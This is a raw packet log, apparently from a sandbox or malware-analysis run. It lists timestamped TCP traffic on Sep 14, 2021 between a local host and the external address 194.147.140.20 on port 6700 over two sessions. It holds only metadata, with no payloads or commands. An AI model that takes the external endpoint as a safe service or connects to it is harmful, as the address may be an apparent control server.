Sep 14, 2021 17:03:33.007910967 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.007966042 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.008018017 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.008019924 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.008074999 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.008104086 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.008135080 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.008188963 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.008244991 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.008244038 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.008312941 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.008337975 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.008378983 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.008435011 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.008480072 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.050219059 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.196043968 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196074009 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196192026 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196207047 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196219921 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196271896 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.196340084 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196371078 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.196430922 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.196472883 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196614981 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196677923 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196691036 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.196814060 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196890116 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.196896076 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.197141886 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.197212934 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.197223902 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.197578907 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.197673082 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.198414087 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198451042 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198513985 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.198532104 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198550940 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198570967 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198610067 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.198657990 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198676109 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198720932 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198725939 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.198741913 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198750019 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.198791027 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.198806047 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.198884010 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.239566088 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.239593983 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.239744902 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.239757061 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.386965990 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.387134075 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.387187004 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.387219906 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.387243032 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.387276888 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.387361050 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.387398958 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.387475967 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.387590885 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.387691021 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.387736082 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.387818098 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.387831926 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.387907982 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.387975931 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.387999058 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.388057947 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.388125896 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.388185978 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.388220072 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.388283014 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.388498068 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.388556004 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.388571978 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.388629913 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.388648033 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.388710022 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.388721943 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.388819933 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.579139948 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579210997 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579251051 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579289913 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579317093 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.579328060 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579340935 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.579375029 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579417944 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579428911 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.579456091 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579493999 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579500914 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.579533100 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579569101 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579581022 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.579607010 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579644918 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.579654932 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.628366947 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.707453012 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.769493103 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.769520044 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.769535065 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.769550085 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.769594908 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.769628048 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.769685030 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.769717932 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.769722939 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.769788027 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.769808054 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.769891977 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.769927979 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.769954920 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.769994974 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.770061970 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.770076036 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.770138025 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.770163059 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.770322084 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.770334005 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.770397902 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:33.817655087 CEST	6700	49777	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:33.817913055 CEST	49777	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:38.151880980 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:38.342421055 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:38.342590094 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:38.343610048 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:38.546112061 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:38.546539068 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:38.736284971 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:38.737586021 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:38.980740070 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:38.980777979 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:38.980808020 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:38.981070995 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:38.981360912 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:38.981432915 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.082717896 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.170649052 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.170721054 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.170838118 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.170840979 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.170893908 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.171209097 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.171242952 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.171266079 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.171289921 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.171300888 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.171346903 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.171380043 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.171432018 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.324127913 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.360244036 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.360294104 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.360416889 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.360465050 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.360718966 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.360758066 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.360778093 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.360837936 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.360891104 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.360903978 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.360919952 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.360970974 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.360989094 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.361006975 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.361072063 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.361076117 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.361103058 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.361157894 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.361161947 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.361190081 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.361242056 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.361242056 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.361269951 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.361324072 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.549868107 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550333977 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550390005 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550462961 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.550488949 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550535917 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550542116 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.550622940 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550704002 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550745010 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550770998 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.550812006 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550858974 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550935030 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.550939083 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.551002979 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551075935 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.551179886 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551220894 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551287889 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551295042 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.551321983 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551403999 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.551424026 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551506996 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551578999 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551589966 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.551611900 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551681042 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.551692963 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551733017 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551805019 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.551836967 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.551918983 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.552002907 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.552004099 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.552112103 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.552181005 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.552189112 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.552217960 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.552295923 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.552309036 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.552418947 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.552495956 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.552499056 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.552545071 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.552617073 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.739722967 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.739840984 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.739949942 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.740029097 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.740175009 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.740228891 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.740330935 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.740927935 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.740958929 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.740993977 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.741056919 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741118908 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.741189003 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741329908 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741353989 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741394043 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.741512060 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741538048 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741565943 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.741689920 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741714954 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741743088 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.741837025 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741858959 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.741884947 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.742125988 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742223978 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.742429972 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742456913 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742479086 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742501974 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742532969 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.742564917 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.742583990 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742742062 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742768049 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742790937 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742809057 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.742835999 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.742878914 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742901087 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742924929 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742944956 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742953062 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.742966890 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742985964 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.742993116 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.743005037 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743024111 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743024111 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.743041039 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743058920 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743060112 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.743096113 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.743175983 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743200064 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743244886 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.743350983 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743503094 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743597031 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.743660927 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743685961 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743746996 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743769884 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743789911 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743807077 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.743809938 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743829012 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743849039 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743868113 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743887901 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.743940115 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.743999958 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.744071007 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.929332018 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.929369926 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.929392099 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.929559946 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.929940939 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.930130959 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.930567980 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.930598974 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.930679083 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.930713892 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.931020975 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.931119919 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.931415081 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.931574106 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932017088 CEST	49778	6700	192.168.2.5	194.147.140.20
Sep 14, 2021 17:03:39.932102919 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932137966 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932171106 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932259083 CEST	6700	49778	194.147.140.20	192.168.2.5
Sep 14, 2021 17:03:39.932329893 CEST	49778	6700	192.168.2.5	194.147.140.20
